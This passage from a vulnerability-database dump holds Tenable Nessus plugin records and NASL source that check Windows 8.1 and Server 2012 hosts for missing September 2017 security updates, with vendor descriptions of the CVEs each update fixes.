An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. 
The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038786/windows-server-2012-update-kb4038786\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91b2bd74\");\n # https://support.microsoft.com/en-us/help/4038799/windows-server-2012-update-kb4038799\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35364720\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038786 or Cumulative update KB4038799.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038786', '4038799');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038786, 4038799])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038793\nor cumulative update 4038792. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. 
(CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. 
By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. 
(CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8682", "CVE-2017-8684", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8680", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8714", "CVE-2017-8728", "CVE-2017-8686", "CVE-2017-8677", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8675"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038792.NASL", "href": "https://www.tenable.com/plugins/nessus/103131", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103131);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038792\");\n script_xref(name:\"MSFT\", value:\"MS17-4038792\");\n script_xref(name:\"MSKB\", value:\"4038793\");\n script_xref(name:\"MSFT\", value:\"MS17-4038793\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038793\nor cumulative update 4038792. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. 
(CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. 
By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. 
(CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038792/windows-8-1-update-kb4038792\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?085e4d22\");\n # https://support.microsoft.com/en-us/help/4038793/windows-8-1-update-kb4038793\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf3ecec7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038793 or Cumulative update KB4038792.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
